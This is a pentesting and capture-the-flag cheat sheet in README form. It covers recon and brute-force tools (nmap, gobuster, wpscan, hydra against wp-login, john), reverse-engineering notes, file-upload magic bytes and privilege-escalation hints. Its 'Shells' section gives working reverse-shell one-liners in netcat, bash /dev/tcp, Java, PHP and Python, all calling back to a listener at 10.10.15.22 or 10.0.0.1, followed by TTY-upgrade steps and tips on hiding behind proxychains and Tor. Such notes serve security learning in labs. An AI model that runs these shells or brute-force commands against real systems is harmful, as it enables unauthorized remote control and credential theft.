└── README.md /README.md: -------------------------------------------------------------------------------- 1 | * [CheatSheet](#cheatsheet) 2 | * [Planned ToDo's](#planned-todos) 3 | * [Useful Guides and Links](#useful-guides-and-links) 4 | * [Local Webserver](#local-webserver) 5 | * [Python](#python) 6 | * [PHP](#php) 7 | * [Ruby](#ruby) 8 | * [Useful Tools](#useful-tools) 9 | * [nmap](#nmap) 10 | * [gobuster](#gobuster) 11 | * [wpscan](#wpscan) 12 | * [CeWL](#cewl) 13 | * [enum4linux](#enum4linux) 14 | * [goofile](#goofile) 15 | * [searchsploit](#searchsploit) 16 | * [John The Ripper – JTR](#john-the-ripper--jtr) 17 | * [hydra](#hydra) 18 | * [Exiftool](#exiftool) 19 | * [radare2](#radare2) 20 | * [Shells](#shells) 21 | * [Set Listener](#set-listener) 22 | * [Reverse Shell](#reverse-shell) 23 | * [netcat](#netcat) 24 | * [Java](#java) 25 | * [PHP](#php-1) 26 | * [Bash](#bash) 27 | * [Python](#python-1) 28 | * [Interactive Shell](#interactive-shell) 29 | * [Bash](#bash-1) 30 | * [Zsh](#zsh) 31 | * [Usefuls Scripts](#usefuls-scripts) 32 | * [HEX Converter](#hex-converter) 33 | * [Ascii to Hex](#ascii-to-hex) 34 | * [Hex to Ascii](#hex-to-ascii) 35 | * [Hide yourself](#hide-yourself) 36 | * [VPN](#vpn) 37 | * [Proxy Chains](#proxy-chains) 38 | * [Tor](#tor) 39 | * [Shellcode Dis/Assembler](#shellcode-disassembler) 40 | * [File Uploads](#file-uploads) 41 | * [Magic Numbers](#magic-numbers) 42 | 43 | # CheatSheet 44 | 45 | ## Planned ToDo's 46 | 47 | - [ ] write scripts for automating the repetitive tasks like: 48 | 1. look for domain of the company 49 | 2. look for subdomains of the domain 50 | 3. look for dns entries 51 | 4. use [Google Hacking](https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06) for deeper recon 52 | 5. generate a detailed report of all findings 53 | 6. ... 54 | 55 | - [x] create a docker-based environment for pentesting/bug bounty hunting (find a way for running GUI based tools in docker) 56 | - [Kali-Docker](https://github.com/DennisFeldbusch/Kali-Docker) 57 | 58 | ## Useful Guides and Links 59 | 60 | For Pentesting/BugBounty-Hunting there is a very detailed [map and guide](https://www.offensity.com/de/blog/just-another-recon-guide-pentesters-and-bug-bounty-hunters/) of how to proceed. 61 | 62 | Very useful BugBounty [CheatSheet](https://github.com/EdOverflow/bugbounty-cheatsheet) from EdOverflow 63 | 64 | Bug Bounty [Writeups](https://hackerone.com/hacktivity) for learning 65 | 66 | ## Local Webserver 67 | 68 | ### Python 69 | 70 | ```python 71 | python -m SimpleHTTPServer 72 | ``` 73 | 74 | ```python 75 | python3 -m http.server 76 | ``` 77 | 78 | ### PHP 79 | ```php 80 | php -S 0.0.0.0:8000 81 | ``` 82 | ### Ruby 83 | ```ruby 84 | ruby -run -e httpd . -p 8000 85 | ``` 86 | ## Useful Tools 87 | 88 | ### [nmap](https://tools.kali.org/information-gathering/nmap) 89 | scans networks 90 | ```shell-script 91 | nmap -sC -sV -oA nmap/openadmin 10.10.10.171 92 | ``` 93 | * `-sC` = scans with the standard scripts 94 | * `-sV` = scans the versions 95 | 96 | ### [gobuster](https://tools.kali.org/web-applications/gobuster) 97 | bruteforce websites to find directories and/or files 98 | ```bash 99 | gobuster dir -u http://10.10.10.10/ -w /path/to/wordlist 100 | ``` 101 | ### [wpscan](https://www.kali.org/tools/wpscan/) 102 | scans a target for wordpress related stuff 103 | ```bash 104 | ## basic scan 105 | wpscan --url 10.10.10.10 106 | 107 | ## advanced scan with plugin detection 108 | wpscan —url 10.10.10.10 —enumerate p,u —plugins-detection aggressive 109 | ``` 110 | ### [CeWL](https://tools.kali.org/password-attacks/cewl) 111 | creates wordlist from website 112 | ```bash 113 | cewl -d 2 -m 5 -w genwords.txt https://10.10.10.10 114 | ``` 115 | ### [enum4linux](https://tools.kali.org/information-gathering/enum4linux) 116 | enumerates Windows and Samba systems 117 | 118 | Ports to look for: 445, 139 119 | ```bash 120 | enum4linux -U -o 10.10.10.10 121 | ``` 122 | ### [goofile](https://tools.kali.org/information-gathering/goofile) 123 | finding specific filetypes in domain 124 | ```bash 125 | goofile -d kali.org -f pdf 126 | ``` 127 | ### [searchsploit](https://www.exploit-db.com/searchsploit) 128 | ```bash 129 | searchsploit tomcat 130 | ``` 131 | ### [John The Ripper – JTR](https://tools.kali.org/password-attacks/john) 132 | 133 | John the Ripper is different from tools like Hydra. Hydra does blind brute-forcing by trying username/password combinations on a service daemon like ftp server or telnet server. John however needs the hash first. So the greater challenge for a hacker is to first get the hash that is to be cracked. Now a days hashes are more easily crackable using free rainbow tables available online. Just go to one of the sites, submit the hash and if the hash is made of a common word, then the site would show the word almost instantly. Rainbow tables basically store common words and their hashes in a large database. Larger the database, more the words covered. 134 | |Command |Description | 135 | |------------------------------------------------------------------------|------------------------------------------| 136 | |john –wordlist=/usr/share/wordlists/rockyou.txt hash |JTR password cracking | 137 | |john –format=descrypt –wordlist/usr/share/wordlists/rockyou.txt hash.txt|JTR forced descrypt cracking with wordlist| 138 | |john –format=descrypt hash –show |JTR forced descrypt brute force cracking | 139 | 140 | ### [hydra](https://www.kali.org/tools/hydra/) 141 | ```zsh 142 | hydra -L wordlist -p test 10.10.147.44 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid Username" -t 30 143 | ``` 144 | 145 | ### [exiftool](https://exiftool.org/) 146 | Tool to read and modify the metadata of files. 147 | #### read metadata 148 | ```zsh 149 | exiftool 150 | ``` 151 | 152 | #### write metadata 153 | ```zsh 154 | exiftool -artist=me 155 | ``` 156 | 157 | ### [radare2](https://www.kali.org/tools/radare2/) 158 | radare2 is a tool for reverse-engineering 159 | ```zsh 160 | # start radare2 161 | radare2 file 162 | 163 | # analyze all 164 | aa 165 | 166 | # list all functions 167 | afl 168 | 169 | # set selection to main function 170 | s main 171 | 172 | # disassemble 173 | pdf 174 | 175 | # show graph 176 | VV 177 | ``` 178 | 179 | ### [wfuzz](https://www.kali.org/tools/wfuzz/) 180 | wfuzz is a web fuzzing tool 181 | 182 | #### example of finding vhosts 183 | ```zsh 184 | wfuzz -H "Host: FUZZ." -c -z file,"" 185 | ``` 186 | 187 | ## Reverse Engineering 188 | 189 | ### Get strings from binary 190 | ```bash 191 | strings binaryFile 192 | ``` 193 | ### Get hexdump from binary 194 | ```bash 195 | hexdump --canonical binaryFile 196 | ``` 197 | 198 | 199 | ### Get assembly 200 | 201 | ```bash 202 | objdump -D -M x86-64 binaryFile 203 | ``` 204 | 205 | ### Use radare2 to reverse engineer binary 206 | 207 | ### x86 registers 208 | ``` 209 | ================ rax (64 bits) 210 | ======== eax (32 bits) 211 | ==== ax (16 bits) 212 | == ah (8 bits) 213 | == al (8 bits) 214 | ``` 215 | 216 | ### register purposes 217 | 218 | | Register | Purpose | Saved across calls | 219 | |----------|----------------------------------------|--------------------| 220 | | RAX | temp register; return value | no | 221 | | RBX | callee-saved | yes | 222 | | RCX | used to pass 4th argument to functions | no | 223 | | RDX | used to pass 3rd argument to functions | no | 224 | | RSP | stack pointer | yes | 225 | | RBP | callee-saved; base pointer | yes | 226 | | RSI | used to pass 2nd argument to functions | no | 227 | | RDI | used to pass 1st argument to functions | no | 228 | | R8 | used to pass 5th argument to functions | no | 229 | | R9 | used to pass 6th argument to functions | no | 230 | | R10-11 | temporary | no | 231 | | R12-15 | callee-saved registers | yes | 232 | 233 | ### RISC (ARM) instruction set 234 | ``` 235 | MOV DESTINATION, SOURCE 236 | ``` 237 | 238 | ### Stack 239 | 240 | #### Stackpointer 241 | - points to the next item on the stack 242 | - grows downwards 243 | 244 | #### Base pointer 245 | - unchanged point in memory where the stack starts 246 | 247 | ``` 248 | memory: CPU: 249 | 250 | 0x0000 ________ 251 | | | <-------------- | SP | 252 | | | |------- | BP | 253 | | | | | IP | 254 | | | <------| | .. | 255 | | | | .. | 256 | | | | .. | 257 | 0xFFFF |______| 258 | ``` 259 | 260 | ## Shells 261 | 262 | ### Set Listener 263 | ```bash 264 | nc -lnvp 4000 265 | ``` 266 | 267 | ### [Reverse Shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) 268 | #### netcat 269 | ```bash 270 | nc -e /bin/sh 10.10.15.22 4000 271 | ``` 272 | #### Java 273 | ```java 274 | r = Runtime.getRuntime() 275 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.15.22/4000;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 276 | p.waitFor() 277 | ``` 278 | #### PHP 279 | ```php 280 | php -r '$sock=fsockopen("10.10.15.22",4000);exec("/bin/sh -i <&3 >&3 2>&3");' 281 | 282 | php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' 283 | ``` 284 | #### Bash 285 | ```bash 286 | bash -i >& /dev/tcp/10.10.15.22/4000 0>&1 287 | ``` 288 | #### Python 289 | ```python 290 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 291 | ``` 292 | ### Interactive Shell 293 | * can be executed with python or python3 294 | #### Bash 295 | ```python 296 | python(3) -c 'import pty; pty.spawn("/bin/bash")' 297 | ``` 298 | ```cmd 299 | Ctrl-Z 300 | ``` 301 | ```cmd 302 | stty raw -echo 303 | ``` 304 | ``` 305 | fg 306 | ``` 307 | #### Zsh 308 | ```python 309 | python(3) -c 'import pty; pty.spawn("/bin/bash")' 310 | ``` 311 | ```cmd 312 | Ctrl-Z 313 | ``` 314 | ```cmd 315 | stty raw -echo; fg 316 | ``` 317 | ## Usefuls Scripts 318 | ### HEX Converter 319 | #### Ascii to Hex 320 | ```bash 321 | #!/bin/bash 322 | echo $1 | tr -d "\n" | hexdump -v -e '16/1 "%02x " "\n"' 323 | ``` 324 | #### Hex to Ascii 325 | ```bash 326 | #!/bin/bash 327 | echo $1 | xxd -r -p 328 | ``` 329 | ## Hide yourself 330 | Interesting [Stack Exchange](https://security.stackexchange.com/questions/103792/is-using-vpn-tor-and-proxychains-together-more-secure) link 331 | ### [VPN]() 332 | ### [Proxy Chains](https://linuxhint.com/proxychains-tutorial/) 333 | A Proxy is an instance between both communication partners. If you send a request to a server the proxy intercepts it and is forwarding this request to the server but is behaving like itself send the request so the server don't know about me. And the exact way back. 334 | 335 | A Proxy Chain are multile Proxy Servers chained together so it is way more difficult to get to know the initial sender(client) 336 | ### [Tor](https://de.wikipedia.org/wiki/Tor_(Netzwerk)) 337 | Here is a nice [graphic](https://www.eff.org/pages/tor-and-https) on who sees what in Tor and HTTPS cases. 338 | 339 | ## [Shellcode Dis/Assembler](http://shell-storm.org/online/Online-Assembler-and-Disassembler/) 340 | 341 | ## File Uploads 342 | 343 | Use 344 | 345 | ### Magic Numbers 346 | 347 | * these magic numbers at the start of a file define the type of file 348 | ``` 349 | BMP : 42 4D 350 | JPG : FF D8 FF E0 351 | PNG : 89 50 4E 47 352 | GIF : 47 49 46 38 353 | ``` 354 | 355 | ## Priviledge Escalation 356 | 357 | - find programms which can be executed as sudo without password 358 | ```bash 359 | sudo -l 360 | ``` 361 | 362 | - find files that belong to root but can be read by (anyone) because of groups 363 | 364 | --------------------------------------------------------------------------------